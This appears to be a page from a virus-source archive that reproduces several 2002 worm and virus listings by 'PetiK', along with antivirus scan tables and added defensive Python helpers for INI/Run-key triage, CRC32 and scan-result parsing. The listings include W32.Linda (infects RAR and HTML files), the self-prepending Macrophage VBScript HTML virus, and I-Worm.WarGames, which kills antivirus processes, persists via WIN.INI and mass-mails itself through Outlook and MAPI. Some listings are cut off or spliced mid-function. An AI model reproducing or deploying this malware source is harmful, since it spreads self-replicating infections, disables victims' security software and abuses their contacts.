TrendMicro 8.950.0.1092 2009.05.15 WORM_FALKEN.A
VBA32 3.12.10.5 2009.05.16 Win32.Worm.Falken
ViRobot 2009.5.15.1737 2009.05.15 -
VirusBuster 4.6.5.0 2009.05.15 I-Worm.Tractex.B
Additional information
File size: 6144 bytes
MD5...: f19278caf2e95e3abd31ad269e1b0814
SHA1..: 4b202c2aabe0a59addf103626cfb304835ecda2e
PEiD..: UPX 2.90 [LZMA] -> Markus Oberhumer, Laszlo Molnar & John Reiser
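Extract's header lists its persistence (copy to %SYSDIR%\UPDATEW32.EXE, RUN= in WIN.INI), Falken queues its original file for deletion through a [rename] NUL= entry in WININIT.INI, and Twin and Essence register under the Run key as "AntiVirus Freeware" and "Microsoft IE". The Python below is an added host-triage helper, not code from the archive: one small parser handles WIN.INI, WININIT.INI and a regedit .reg export (they share the [section]/name=value layout) and reports the entries that match those artifacts. The three input files are constructed; the name lists are the ones visible in the listings and are not exhaustive.

```python
import ntpath

# Names taken from the listings on this page: value names the worms write under the Run key
# and the file names they drop. Extend with your own IOCs; nothing here is exhaustive.
KNOWN_RUN_VALUES = {
    "antivirus freeware": "I-Worm.Twin",
    "microsoft ie": "I-Worm.Essence",
}
KNOWN_DROPPED_FILES = {
    "avw32.exe": "I-Worm.Twin",
    "msie32.exe": "I-Worm.Essence",
    "updatew32.exe": "I-Worm.Extract",
    "maj.exe": "I-Worm.Extract",
    "winbackup.exe": "I-Worm.Falken",
}
RUN_KEY = r"hkey_local_machine\software\microsoft\windows\currentversion\run"


def parse_ini(text: str) -> dict:
    """Minimal section parser for WIN.INI/WININIT.INI and for regedit .reg exports, which use
    the same [section] / name=value layout (with quoted names and values and doubled backslashes).
    Returns {section_lowercased: {name: value}}."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line[0] in ";#":
            continue
        if line.startswith("[") and line.endswith("]"):
            current = line[1:-1].lower()
            sections.setdefault(current, {})
            continue
        if current is None or "=" not in line:
            continue
        name, value = (s.strip() for s in line.split("=", 1))
        name = name.strip('"')
        if len(value) >= 2 and value[0] == value[-1] == '"':
            value = value[1:-1].replace("\\\\", "\\")   # .reg export escaping
        sections[current][name] = value
    return sections


def check_win_ini(text: str) -> list:
    """WIN.INI [windows] run= and load= start programs at logon on Win9x; Extract's header
    says it writes RUN= there."""
    return [f"win.ini [windows] {k}={v}"
            for k, v in parse_ini(text).get("windows", {}).items()
            if k.lower() in ("run", "load") and v]


def check_wininit_ini(text: str) -> list:
    """WININIT.INI [rename] entries are applied by WININIT.EXE at the next boot. Falken writes
    NUL=<its original path>, which deletes the file the user ran once it has copied itself."""
    findings = []
    for target, source in parse_ini(text).get("rename", {}).items():
        what = "deleted at next boot" if target.upper() == "NUL" else f"renamed to {target} at next boot"
        findings.append(f"wininit.ini [rename] {source} {what}")
    return findings


def check_run_key(reg_text: str) -> list:
    """Flag Run values whose name, or whose target file name, matches one of the samples."""
    findings = []
    for name, value in parse_ini(reg_text).get(RUN_KEY, {}).items():
        family = (KNOWN_RUN_VALUES.get(name.lower())
                  or KNOWN_DROPPED_FILES.get(ntpath.basename(value).lower()))
        if family:
            findings.append(f"Run value '{name}' -> {value} (matches {family})")
    return findings


def triage(win_ini: str, wininit_ini: str, reg_export: str) -> list:
    return check_win_ini(win_ini) + check_wininit_ini(wininit_ini) + check_run_key(reg_export)


# Constructed samples standing in for files pulled from a suspect Win9x box.
SAMPLE_WIN_INI = "[windows]\nload=\nrun=C:\\WINDOWS\\SYSTEM\\UPDATEW32.EXE\n[Desktop]\nWallpaper=(None)\n"
SAMPLE_WININIT_INI = "[rename]\nNUL=C:\\Downloads\\falken.exe\n"
SAMPLE_REG_EXPORT = r"""Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run]
"AntiVirus Freeware"="C:\\WINDOWS\\AVW32.exe"
"Microsoft IE"="C:\\WINDOWS\\SYSTEM\\Msie32.exe"
"Update"="C:\\Program Files\\Update Windows 32bits\\MAJ.exe"
"SynTPEnh"="C:\\Program Files\\Synaptics\\SynTP\\SynTPEnh.exe"
"""

if __name__ == "__main__":
    for finding in triage(SAMPLE_WIN_INI, SAMPLE_WININIT_INI, SAMPLE_REG_EXPORT):
        print(finding)
```

The value names are deliberately chosen to look like legitimate software, so a match on the file name (the "Update" entry above) matters as much as a match on the value name; an unknown name pointing into the system directory is worth a look even when neither list fires.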
comment §
Name : W32.Linda
Date : February 13th 2002
Author : PetiK
Language : Win32asm
Size : 8192 (compressed with ASPack).
Action : Infects rar files and ht* files in the current directory.
§
.386
locals
jumps
.model flat,STDCALL
api macro x
extrn x:proc
call x
endm
WIN32_FIND_DATA struct
dwFileAttributes dd 0
ftCreationTime dd ?,?
ftLastAccessTime dd ?,?
ftLastWriteTime dd ?,?
nFileSizeHigh dd 0
nFileSizeLow dd 0
dwReserved0 dd 0,0
cFileName db 260 dup(0)
cAlternateFileName db 14 dup(0)
db 2 dup (0)
WIN32_FIND_DATA ends
.DATA
CRLF equ <13,10>
ffile WIN32_FIND_DATA <?>
sysTime db 16 dup(0)
push 50
mov esi,offset orig_virus
push esi
push 0
api GetModuleFileNameA
push 4
push 1000h
push 8192
push 0
api VirtualAlloc
test eax,eax
je end_srch_rar
mov dword ptr [mHnd],eax
push 0
push 80h
push 3
push 0
push 1
push 80000000h
push offset orig_virus
api CreateFileA
cmp eax,-1
je end_srch_rar
mov dword ptr [fHnd],eax
push 0
mov dword ptr [sizer],0
lea eax,sizer
push eax
push 8192
push dword ptr [mHnd]
push dword ptr [fHnd]
api ReadFile
push dword ptr [mHnd]
api CloseHandle
rar_srch:
push offset ffile
push offset rarmask
api FindFirstFileA
dec eax
jz end_srch_rar
inc eax
mov dword ptr [hFile],eax
inf_rar:
call times
call infect
cmp byte ptr [Err],1
je rar_nxt_srch
call timer
rar_nxt_srch:
push offset ffile
mov eax,dword ptr [hFile]
push eax
api FindNextFileA
test eax,eax
jnz inf_rar
mov eax,dword ptr [hFile]
push eax
api FindClose
end_srch_rar:
htm_srch:
push offset ffile
push offset htmmask
api FindFirstFileA
dec eax
jz end_srch_htm
inc eax
mov dword ptr [hFile],eax
inf_htm:
call infecthtm
htm_nxt_srch:
push offset ffile
mov eax,dword ptr [hFile]
push eax
api FindNextFileA
test eax,eax
jnz inf_htm
mov eax,dword ptr [hFile]
push eax
api FindClose
end_srch_htm:
end_linda:
push 0
api ExitProcess
times: push 0
push 80h
push 3
push 0
push 1
push 80000000h
push offset ffile.cFileName
api CreateFileA
cmp eax,-1
je tserr
mov dword ptr [thFile],eax
push offset time0
push offset time1
push offset time2
push dword ptr [thFile]
api GetFileTime
push dword ptr [thFile]
api CloseHandle
mov byte ptr [Err],0
ret
tserr: mov byte ptr [Err],1
ret
timer: push 0
push 80h
push 3
push 0
push 1
push 40000000h
push offset ffile.cFileName
api CreateFileA
cmp eax,-1
je trerr
mov dword ptr [thFile],eax
push offset time0
push offset time1
push offset time2
push dword ptr [thFile]
api SetFileTime
push dword ptr [thFile]
api CloseHandle
trerr: ret
infecthtm:
push offset ffile.cFileName
api GetFileAttributesA
cmp eax,1 or 20h
je end_inf_htm
push 0
push 80h
push 3
push 0
push 1
push 40000000h
push offset ffile.cFileName
api CreateFileA
cmp eax,-1
je end_inf_htm
mov dword ptr [fHnd],eax
push 2
push 0
push dword ptr [fHnd]
api _llseek
push 0
push offset octets
push e_htm - s_htm
call e_htm
s_htm: db "",CRLF,CRLF
db "<SCRIPT Language=VBScript>",CRLF
db "On Error Resume Next",CRLF
db "document.Write ""<font face='verdana' color=green size='2'>Hi guy ! How are you ?"
db "<br>If you read these lines, is that you are infected by my Virus Linda."
db "<br>Look at your RAR files. They could be infected too."
db "<br>Good Bye and have a nice day.<br></font>""",0dh,0ah
db "</SCRIPT>",0dh,0ah
e_htm:
push dword ptr [fHnd]
api WriteFile
push dword ptr [fHnd]
api CloseHandle
push 1 or 20h
push offset ffile.cFileName
api SetFileAttributesA
end_inf_htm:
ret
CRC32: cld
push ebx
mov ecx,-1 ;xor ecx,ecx & dec ecx
mov edx,ecx
NextByteCRC:
xor eax,eax
xor ebx,ebx
lodsb
xor al,cl
mov cl,ch
mov ch,dl
mov dl,dh
mov dh,8
NextBitCRC:
shr bx,1
rcr ax,1
jnc NoCRC
xor ax,08320h
xor bx,0edb8h
NoCRC:
dec dh
jnz NextBitCRC
xor ecx,eax
xor edx,ebx
dec di
jnz NextByteCRC
not edx
not ecx
pop ebx
mov eax,edx
rol eax,16
mov ax,cx
ret
ends
end start_linda
File w32linda32.exe received on 05.16.2009 19:48:06 (CET)
Additional information
File size: 8192 bytes
MD5...: 2bdfd3609d98f54cc1c8fc7e3f5e925c
SHA1..: 1e1c42c4d1cefd930ca37e60ba8689f3d0da174c
PEiD..: ASPack v2.12
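The CRC32 routine at the end of the Linda listing is the classic table-free CRC-32: register seeded with -1, polynomial 0xEDB88320 kept as the two 16-bit halves 08320h/0EDB8h, one right shift per input bit with the polynomial xored in whenever a 1 falls out, and a final complement. The Python below is an added re-implementation, not PetiK's code: it makes the algorithm readable, shows the 256-entry table that the inner 8-iteration loop computes on the fly for each byte, and checks both forms against zlib.crc32 on constructed input.

```python
import zlib

POLY = 0xEDB88320   # the listing keeps this in two halves: xor ax,08320h / xor bx,0edb8h


def crc32_bitwise(data: bytes, crc: int = 0) -> int:
    """Table-free reflected CRC-32, the algorithm the W32.Linda CRC32 routine implements.
    The register starts at -1 ('mov ecx,-1 / mov edx,ecx'), each input byte is folded into
    the low byte ('xor al,cl'), the register is shifted right one bit at a time ('shr bx,1 /
    rcr ax,1'), the polynomial is xored in whenever a 1 falls out ('jnc NoCRC' skips it),
    and the result is inverted at the end ('not edx / not ecx')."""
    reg = crc ^ 0xFFFFFFFF
    for byte in data:
        reg ^= byte
        for _ in range(8):                # 'mov dh,8' ... 'dec dh / jnz NextBitCRC'
            carry = reg & 1
            reg >>= 1
            if carry:
                reg ^= POLY
    return reg ^ 0xFFFFFFFF


def make_table() -> list:
    """The 256-entry table that the inner 8-bit loop above computes on the fly for one byte."""
    table = []
    for n in range(256):
        v = n
        for _ in range(8):
            v = (v >> 1) ^ POLY if v & 1 else v >> 1
        table.append(v)
    return table


CRC_TABLE = make_table()


def crc32_table(data: bytes, crc: int = 0) -> int:
    """Same CRC, one table lookup per byte: crc = (crc >> 8) ^ T[(crc ^ b) & 0xFF]."""
    reg = crc ^ 0xFFFFFFFF
    for byte in data:
        reg = (reg >> 8) ^ CRC_TABLE[(reg ^ byte) & 0xFF]
    return reg ^ 0xFFFFFFFF


def matches_zlib(data: bytes) -> bool:
    """Cross-check both implementations against the reference in the standard library."""
    return crc32_bitwise(data) == zlib.crc32(data) == crc32_table(data)


# Constructed input; 0xCBF43926 is the published check value for "123456789".
SAMPLE = b"123456789"

if __name__ == "__main__":
    print(hex(crc32_bitwise(SAMPLE)), hex(crc32_table(SAMPLE)), matches_zlib(SAMPLE))
```

Both functions accept a running CRC, so they chain the same way zlib.crc32 does; that matters when a routine like this is used to checksum a file in chunks or to hash strings for comparison, where a mismatch in seeding or final inversion gives values that look plausible but never match the reference.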
<macrophage>
<html><head><title>Internet Explo$er</title></head><body>
<script language=vbscript>
On Error Resume Next
set fso=createobject("scripting.filesystemobject")
If err.number=429 then
document.write "<font face='Lucida Console' size='2' color=black>You need ActiveX enabled to see this file<br><a href='javascript:location.reload()'>Click Here</a> to reload and click Yes</font>"
Else
Set ws=CreateObject("WScript.Shell")
cache=ws.RegRead("HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cache")
cook=ws.RegRead("HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Cookies")
desk=ws.RegRead("HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Desktop")
favor=ws.RegRead("HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Favorites")
pers=ws.RegRead("HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Personal")
infect(fso.GetSpecialFolder(0))
infect(fso.GetSpecialFolder(1))
infect(fso.GetSpecialFolder(2))
infect(cache)
infect(cook)
infect(desk)
infect(favor)
infect(pers)
If Day(Now())=10 Then
document.write "<font face='verdana' size='2' color=black>Sorry but your browser can't read this page.<br>Try an another day.<br></font>"
document.write "<font face='verdana' size='2' color=blue><br>GOOD BYE and HAVE A NICE DAY.</font>"
End If
End If
Function infect(doss)
Set FolderObj = FSO.GetFolder(doss)
Set FO = FolderObj.Files
For each cible in FO
ext = lcase(FSO.GetExtensionName(cible.Name))
if ext="htm" or ext="html" or ext="htz" or ext="hta" or ext="asp" Then
Set good = fso.OpenTextFile(cible.path, 1, False)
if good.readline <> "<macrophage>" Then
good.close()
Set good = fso.OpenTextFile(cible.path, 1, False)
htmorg = good.ReadAll()
good.close()
Set virus = document.body.createTextRange
Set good = fso.CreateTextFile(cible.path, True, False)
good.WriteLine "<macrophage>"
good.Write(htmorg)
good.WriteLine virus.htmltext
good.Close()
else
good.close()
end if
end if
next
End Function
</script></html>
File Macrophage.htm received on 05.16.2009 17:51:50 (CET)
Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 Virus.VBS.Petik!IK
AhnLab-V3 5.0.0.2 2009.05.16 HTML/Petik
AntiVir 7.9.0.168 2009.05.15 VBS/Petik.Good
Antiy-AVL 2.0.3.1 2009.05.15 Virus/VBS.VBS
Authentium 5.1.2.4 2009.05.16 VBS/Petik.K
Avast 4.8.1335.0 2009.05.15 VBS:Malware-gen
AVG 8.5.0.336 2009.05.15 VBS/Rophage.A
BitDefender 7.2 2009.05.16 VBS.Petik.A
CAT-QuickHeal 10.00 2009.05.15 VBS/Petik.K
ClamAV 0.94.1 2009.05.16 -
Comodo 1157 2009.05.08 -
DrWeb 5.0.0.12182 2009.05.16 VBS.Macrophage
eSafe 7.0.17.0 2009.05.14 VBS.Petik.a.
eTrust-Vet 31.6.6508 2009.05.16 VBS/Rophage
F-Prot 4.4.4.56 2009.05.16 VBS/Petik.K
F-Secure 8.0.14470.0 2009.05.15 Virus.VBS.Petik
Fortinet 3.117.0.0 2009.05.16 VBS/Petik.K
GData 19 2009.05.16 VBS.Petik.A
Ikarus T3.1.1.49.0 2009.05.16 Virus.VBS.Petik
K7AntiVirus 7.10.737 2009.05.16 -
Kaspersky 7.0.0.125 2009.05.16 Virus.VBS.Petik
McAfee 5616 2009.05.15 VBS/Rophage
McAfee+Artemis 5616 2009.05.15 VBS/Rophage
McAfee-GW-Edition 6.7.6 2009.05.15 Script.Petik.Good
Microsoft 1.4602 2009.05.16 Virus:VBS/Petik
NOD32 4080 2009.05.15 VBS/Petik.B
Norman 6.01.05 2009.05.16 VBS/Petik.C
nProtect 2009.1.8.0 2009.05.16 VBS.Petik.A
Panda 10.0.0.14 2009.05.16 HTML/Mage
PCTools 4.4.2.0 2009.05.16 VBS.Acroph.A
Prevx 3.0 2009.05.16 -
Rising 21.29.52.00 2009.05.16 VBS.Petik
Sophos 4.41.0 2009.05.16 -
Sunbelt 3.2.1858.2 2009.05.16 -
Symantec 1.4.4.12 2009.05.16 VBS.Prepend
TheHacker 6.3.4.1.326 2009.05.15 -
TrendMicro 8.950.0.1092 2009.05.15 VBS_PETIK.B
VBA32 3.12.10.5 2009.05.16 Virus.VBS.Petik
ViRobot 2009.5.15.1737 2009.05.15 -
VirusBuster 4.6.5.0 2009.05.16 VBS.Acroph.A
Additional information
File size: 2226 bytes
MD5...: fee8a8a543264ddb70fa00cfbd10625b
SHA1..: 800f9ec17e06d88ecbe5979289e4f67847770561
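The multi-engine scan tables reproduced throughout this archive are flattened to one line per engine, with the verdict possibly containing spaces and "-" meaning no detection. The Python below is an added example (it is not part of the archive and not a tool of any scanning service): it parses that layout, counts detections, lists the engines that missed the file, and lets the engines vote on a family name by stripping the generic tokens from their verdicts. The sample block is a subset of the Macrophage results above.

```python
"""Parse flattened multi-engine scan tables (one engine per line) and summarize
detection coverage and the family name the engines agree on.
Added example; the sample below is a subset of the Macrophage table on this page."""
import re
from collections import Counter

# vendor, engine version, signature date (YYYY.MM.DD), verdict (may contain spaces)
RESULT_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\d{4}\.\d{2}\.\d{2})\s+(.+?)\s*$")

# Tokens that carry no family information in vendor naming schemes.
GENERIC = {"virus", "worm", "vbs", "html", "js", "win32", "script", "email",
           "malware", "gen", "generic", "trojan", "probably", "unknown"}


def parse_results(text):
    """Return a list of {vendor, version, updated, result}; result is None for '-'."""
    rows = []
    for line in text.splitlines():
        m = RESULT_RE.match(line.strip())
        if not m:
            continue  # header line, "Additional information", hashes, etc.
        vendor, version, updated, result = m.groups()
        rows.append({"vendor": vendor, "version": version, "updated": updated,
                     "result": None if result == "-" else result})
    return rows


def family_tokens(name):
    """Split a detection name into lowercase tokens, dropping short and generic ones."""
    return [t for t in re.split(r"[^0-9a-zA-Z]+", name.lower())
            if len(t) >= 3 and t not in GENERIC]


def summarize(text):
    """Detection count, engine count, voted family name and the engines that missed."""
    rows = parse_results(text)
    detected = [r for r in rows if r["result"]]
    votes = Counter()
    for r in detected:
        votes.update(set(family_tokens(r["result"])))  # one vote per engine per token
    family, count = votes.most_common(1)[0] if votes else (None, 0)
    return {"detected": len(detected), "engines": len(rows),
            "family": family, "family_votes": count,
            "missed_by": [r["vendor"] for r in rows if not r["result"]]}


SAMPLE_SCAN = """File Macrophage.htm received on 05.16.2009 17:51:50 (CET)
Antivirus Version Last Update Result
a-squared 4.0.0.101 2009.05.16 Virus.VBS.Petik!IK
AVG 8.5.0.336 2009.05.15 VBS/Rophage.A
ClamAV 0.94.1 2009.05.16 -
DrWeb 5.0.0.12182 2009.05.16 VBS.Macrophage
Kaspersky 7.0.0.125 2009.05.16 Virus.VBS.Petik
NOD32 4080 2009.05.15 VBS/Petik.B
Sophos 4.41.0 2009.05.16 -
TrendMicro 8.950.0.1092 2009.05.15 VBS_PETIK.B
Additional information
File size: 2226 bytes
"""

if __name__ == "__main__":
    print(summarize(SAMPLE_SCAN))
```

The vote is deliberately per engine and per token, so an engine whose verdict repeats a token does not count twice, and the "missed_by" list is what a defender feeds back to vendors or uses to judge which products on the estate would have caught the sample at that date.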
/*
Name : I-Worm.WarGames
Author : PetiK
Date : February 12th 2002 - February 22nd 2002
Language : C++/Win32asm
*/
#include <stdio.h>
#include <windows.h>
#include <mapi.h>
#include <tlhelp32.h>
#pragma argused
#pragma inline
char filename[100],sysdir[100],copyr[50]="w",winhtm[100],subj[50];
int num,counter=0;
char *alph[]={"a","b","c","d","e","f","g","h","i","j","k","l","m",
"n","o","p","q","r","s","t","u","v","w","x","y","z"};
char dn[20]="Wargames Uninstall",ust[40]="rundll32 mouse,disable";
LPSTR SHFolder=".DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders";
BYTE desktop[50],favoris[50],personal[50],cache[50],page[150];
DWORD sizcache=sizeof(desktop),sizfavoris=sizeof(favoris),
sizpersonal=sizeof(personal),sizdesktop=sizeof(cache),spage=sizeof(page);
DWORD type=REG_SZ;
FILE *vbsworm,*winstart;
HANDLE lSnapshot,myproc;
BOOL rProcessFound;
LHANDLE session;
MapiMessage mess;
MapiMessage *mes;
MapiRecipDesc from;
char messId[512],mname[50],maddr[30];
HINSTANCE hMAPI;
WIN32_FIND_DATA ffile;
PROCESSENTRY32 uProcess;
HKEY hReg;
SYSTEMTIME wartime;
int WINAPI WinMain (HINSTANCE hInst, HINSTANCE hPrev, LPSTR lpCmd, int nShow)
{
// Kill Some AntiVirus
StopAV("AVP32.EXE"); // AVP
StopAV("AVPCC.EXE"); // AVP
StopAV("AVPM.EXE"); // AVP
StopAV("WFINDV32.EXE"); // Dr. Solomon
StopAV("F-AGNT95.EXE"); // F-Secure
StopAV("NAVAPW32.EXE"); // Norton Antivirus
StopAV("NAVW32.EXE"); // Norton Antivirus
StopAV("NMAIN.EXE"); // Norton Antivirus
StopAV("PAVSCHED.EXE"); // Panda AntiVirus
StopAV("ZONEALARM.EXE"); // ZoneAlarm
GetModuleFileName(hInst,filename,100);
GetSystemDirectory((char *)sysdir,100);
SetCurrentDirectory(sysdir);
CopyFile(filename,"article.doc.exe",TRUE);
RegCreateKey(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\WarGames Worm",&hReg);
RegSetValueEx(hReg,"DisplayName",0,REG_SZ,(BYTE *)dn,20);
RegSetValueEx(hReg,"UninstallString",0,REG_SZ,(BYTE *)ust,40);
RegCloseKey(hReg);
randomize();
num=rand() % 10;
randname:
strcat(copyr,alph[GetTickCount()%25]);
if(++counter==num) {
strcat(copyr,".exe");
MessageBox(NULL,copyr,"New Copy Name:",MB_OK|MB_ICONINFORMATION);
CopyFile(filename,copyr,FALSE);
WriteProfileString("WINDOWS","RUN",copyr);
WritePrivateProfileString("rename","NUL",filename,"WININIT.INI");
goto endrandname;
}
Sleep(GetTickCount()%100);
goto randname;
endrandname:
hMAPI=LoadLibrary("MAPI32.DLL");
(FARPROC &)mSendMail=GetProcAddress(hMAPI, "MAPISendMail");
RegOpenKeyEx(HKEY_USERS,SHFolder,0,KEY_QUERY_VALUE,&hReg);
RegQueryValueEx(hReg,"Desktop",0,&type,desktop,&sizdesktop);
RegQueryValueEx(hReg,"Favorites",0,&type,favoris,&sizfavoris);
RegQueryValueEx(hReg,"Personal",0,&type,personal,&sizpersonal);
RegQueryValueEx(hReg,"Cache",0,&type,cache,&sizcache);
RegCloseKey(hReg);
GetWindowsDirectory((char *)winhtm,100);
_asm
{
call @wininet
db "WININET.DLL",0
@wininet:
call LoadLibrary
test eax,eax
jz end_asm
mov ebp,eax
call @inetconnect
db "InternetGetConnectedState",0
@inetconnect:
push ebp
call GetProcAddress
test eax,eax
jz end_wininet
mov edi,eax
verf:
push 0
push Tmp
call edi
dec eax
jnz verf
end_wininet:
push ebp
call FreeLibrary
end_asm:
jmp end_all_asm
Tmp dd 0
end_all_asm:
}
FindFile(desktop,"*.htm");
FindFile(desktop,"*.doc");
FindFile(favoris,"*.ht*");
FindFile(personal,"*.ht*");
FindFile(personal,"*.doc");
FindFile(personal,"*.xls");
FindFile(personal,"*.asp");
FindFile(cache,".ht*");
FindFile(cache,".php");
FindFile(cache,".asp");
FindFile(winhtm,".ht*");
FindFile(winhtm,".doc");
vbsworm=fopen("wargames.vbs","w");
fprintf(vbsworm,"On Error Resume Next\n");
fprintf(vbsworm,"msgbox %cScripting.FileSystemObject%c\n",34,34);
fprintf(vbsworm,"Set sf=CreateObject(%cScripting.FileSystemObject%c)\n",34,34);
fprintf(vbsworm,"Set sys=sf.GetSpecialFolder(1)\n");
fprintf(vbsworm,"Set OA=CreateObject(%cOutlook.Application%c)\n",34,34);
fprintf(vbsworm,"Set MA=OA.GetNameSpace(%cMAPI%c)\n",34,34);
fprintf(vbsworm,"For Each C In MA.AddressLists\n");
fprintf(vbsworm,"If C.AddressEntries.Count <> 0 Then\n");
fprintf(vbsworm,"For D=1 To C.AddressEntries.Count\n");
fprintf(vbsworm,"Set AD=C.AddressEntries(D)\n");
fprintf(vbsworm,"Set EM=OA.CreateItem(0)\n");
fprintf(vbsworm,"EM.To=AD.Address\n");
fprintf(vbsworm,"EM.Subject=%cHi %c&AD.Name&%c read this.%c\n",34,34,34,34);
fprintf(vbsworm,"body=%cI found this on the web and it is important.%c\n",34,34);
fprintf(vbsworm,"body = body & VbCrLf & %cOpen the attached file and read.%c\n",34,34);
fprintf(vbsworm,"EM.Body=body\n");
fprintf(vbsworm,"EM.Attachments.Add(sys&%c\\article.doc.exe%c)\n",34,34);
fprintf(vbsworm,"EM.DeleteAfterSubmit=True\n");
fprintf(vbsworm,"If EM.To <> %c%c Then\n",34,34);
fprintf(vbsworm,"EM.Send\n");
fprintf(vbsworm,"End If\n");
fprintf(vbsworm,"Next\n");
fprintf(vbsworm,"End If\n");
fprintf(vbsworm,"Next\n");
fclose(vbsworm);
ShellExecute(NULL,"open","wargames.vbs",NULL,NULL,SW_SHOWNORMAL);
Sleep(5000);
DeleteFile("wargames.vbs");
hf=CreateFile(namefile,GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,FILE_ATTRIBUTE_ARCHIVE,0);
if(hf==INVALID_HANDLE_VALUE)
return;
size=GetFileSize(hf,NULL);
if(!size)
return;
if(size<8)
return;
size-=100;
hf2=CreateFileMapping(hf,0,PAGE_READONLY,0,0,0);
if(!hf2) {
CloseHandle(hf);
return;
}
mapped=(char *)MapViewOfFile(hf2,FILE_MAP_READ,0,0,0);
if(!mapped) {
CloseHandle(hf2);
CloseHandle(hf);
return;
}
i=0;
while(i<size && !test) {
if(!strncmpi("mailto:",mapped+i,strlen("mailto:"))) {
test=TRUE;
i+=strlen("mailto:");
k=0;
while(mapped[i]!=34 && mapped[i]!=39 && i<size && k<127) {
if(mapped[i]!=' ') {
mail[k]=mapped[i];
k++;
if(mapped[i]=='@')
valid=TRUE;
}
i++;
}
mail[k]=0;
} else
i++;
}
if(!valid)
mail[0]=0;
UnmapViewOfFile(mapped);
CloseHandle(hf2);
CloseHandle(hf);
return;
}
mess.lpRecips=(MapiRecipDesc *)malloc(sizeof(MapiRecipDesc));
if(!mess.lpRecips)
return;
memset(mess.lpRecips,0,sizeof(MapiRecipDesc));
mess.lpRecips->lpszName=tos;
mess.lpRecips->lpszAddress=tos;
mess.lpRecips->ulRecipClass=MAPI_TO;
mess.nRecipCount=1;
mess.lpFiles=(MapiFileDesc *)malloc(sizeof(MapiFileDesc));
if(!mess.lpFiles)
return;
memset(mess.lpFiles,0,sizeof(MapiFileDesc));
mess.lpFiles->lpszPathName=filename;
mess.lpFiles->lpszFileName="patch.exe";
mess.nFileCount=1;
mess.lpOriginator=&from;
mSendMail(0,0,&mess,0,0);
free(mess.lpRecips);
free(mess.lpFiles);
}
Additional information
File size: 77824 bytes
MD5...: f3f60781ccd4c9c429a1431f0162a295
SHA1..: d6ff0b428178a9898f1552a0d18e59b48686cb67
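WarGames persists through WriteProfileString("WINDOWS","RUN",copyr), that is the run= line of the [windows] section of WIN.INI, and gets rid of its original file with a NUL= entry in the [rename] section of WININIT.INI, which Windows 9x processes at the next boot; LiTeLo, later on this page, uses the same WININIT.INI trick in its uninstall path. The Python below is an added example, not code from the archive: it parses both files (keeping duplicate NUL= keys, which configparser would silently drop) and lists the programs started at logon and the queued file operations. Both INI texts are constructed; "wqf.exe" stands in for the "w" plus random letters name WarGames generates.

```python
"""Audit the two Win9x-era INI mechanisms used by the worms on this page:
WIN.INI [windows] run=/load= (programs started at logon) and WININIT.INI [rename]
(file moves applied at the next boot; NUL=path means "delete path").
Added example, not part of the archive; the INI contents below are constructed."""
import re

SECTION_RE = re.compile(r"^\[(.+?)\]$")


def parse_ini(text):
    """Parse INI text into {section_lower: [(key, value), ...]}. Duplicate keys are
    kept because WININIT.INI legitimately carries several NUL= lines."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith(";"):
            continue
        m = SECTION_RE.match(line)
        if m:
            current = m.group(1).lower()
            sections.setdefault(current, [])
            continue
        if current is None or "=" not in line:
            continue
        key, _, value = line.partition("=")
        sections[current].append((key.strip(), value.strip()))
    return sections


def logon_programs(win_ini):
    """Programs WIN.INI starts at logon via run= and load= (space or comma separated)."""
    started = []
    for key, value in parse_ini(win_ini).get("windows", []):
        if key.lower() in ("run", "load"):
            started.extend(p for p in re.split(r"[ ,]+", value) if p)
    return started


def pending_file_ops(wininit_ini):
    """Return (deletions, renames) queued in WININIT.INI; renames are (source, destination)."""
    deletions, renames = [], []
    for key, value in parse_ini(wininit_ini).get("rename", []):
        if key.lower() == "nul":
            deletions.append(value)
        else:
            renames.append((value, key))  # the INI line reads destination=source
    return deletions, renames


# Constructed samples (not captured from a real system).
SAMPLE_WIN_INI = r"""[windows]
load=
run=wqf.exe
NullPort=None
"""

SAMPLE_WININIT_INI = r"""[rename]
NUL=C:\Temp\article.doc.exe
C:\WINDOWS\SYSTEM\newdriver.dll=C:\WINDOWS\TEMP\newdriver.tmp
NUL=C:\WINDOWS\TEMP\setup.log
"""

if __name__ == "__main__":
    print("logon:", logon_programs(SAMPLE_WIN_INI))
    print("pending:", pending_file_ops(SAMPLE_WININIT_INI))
```

On a live Windows 9x box the two files sit in the Windows directory; WININIT.INI only exists while operations are pending, so its mere presence after a clean boot is itself worth a look.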
<html><head><title>Love Linda</title>
<body bgColor=blue onLoad="window.status='I LOVE YOU Linda'">
<font face='verdana' color=yellow size='3'>For Linda...<br>
<br>Because I Love You.
<br>I code this.<br>I can't say what I feel for you.
<br>You will know by this way.<br></font>
<SCRIPT Language=VBScript>
On Error Resume Next
msgbox "Please accept the ActiveX",vbinformation,"Info"
Set fso=CreateObject("Scripting.FileSystemObject")
Set ws=CreateObject("WScript.Shell")
If err.number=429 then
ws.Run javascript:location.reload()
Else
Set win=fso.GetSpecialFolder(0)
Set sys=fso.GetSpecialFolder(1)
Set linda = fso.CreateTextFile(win&"\LoveLinda.htm", 2)
Set love = document.body.createTextRange
linda.WriteLine "<html><head><title>Love Linda</title>"
linda.WriteLine "<body bgColor=blue>"
linda.WriteLine love.htmltext
linda.WriteLine "</body></html>"
linda.Close
pers=ws.RegRead("HKEY_USERS\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders\Personal")
create(win)
create(sys)
create(pers)
cv="HKLM\Software\Microsoft\Windows\CurrentVersion"
ws.RegWrite cv&"\RegisteredOwner","Linda"
